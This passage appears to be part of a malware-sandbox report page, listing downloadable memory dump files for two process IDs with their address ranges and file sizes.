Filesize
136KB

Download
memory/3824-74-0x0000000008010000-0x00000000085B4000-memory.dmp

Filesize
5.6MB

Download
memory/3824-13-0x00000000055C0000-0x0000000005914000-memory.dmp

Filesize
3.3MB

Download
memory/3824-7-0x0000000005550000-0x00000000055B6000-memory.dmp

Filesize
408KB

Download
memory/3824-6-0x00000000054E0000-0x0000000005546000-memory.dmp

Filesize
408KB

Download
memory/3824-71-0x0000000070BCE000-0x0000000070BCF000-memory.dmp

Filesize
4KB

Download
memory/3824-18-0x0000000005BA0000-0x0000000005BBE000-memory.dmp

Filesize
120KB

Download
memory/3824-65-0x0000000006160000-0x0000000006168000-memory.dmp

Filesize
32KB

Download
memory/3824-0-0x0000000070BCE000-0x0000000070BCF000-memory.dmp

Filesize
4KB

Download
memory/3824-5-0x0000000005390000-0x00000000053B2000-memory.dmp

Filesize
136KB

Download
memory/3824-4-0x0000000070BC0000-0x0000000071370000-memory.dmp

Filesize
7.7MB

Download
memory/3824-2-0x0000000070BC0000-0x0000000071370000-memory.dmp

Filesize
7.7MB

Download
memory/3824-3-0x0000000004CF0000-0x0000000005318000-memory.dmp

Filesize
6.2MB

Download
memory/3824-1-0x00000000045E0000-0x0000000004616000-memory.dmp

Filesize
216KB

Download
memory/4744-110-0x0000000005480000-0x0000000005564000-memory.dmp

Filesize
912KB

Download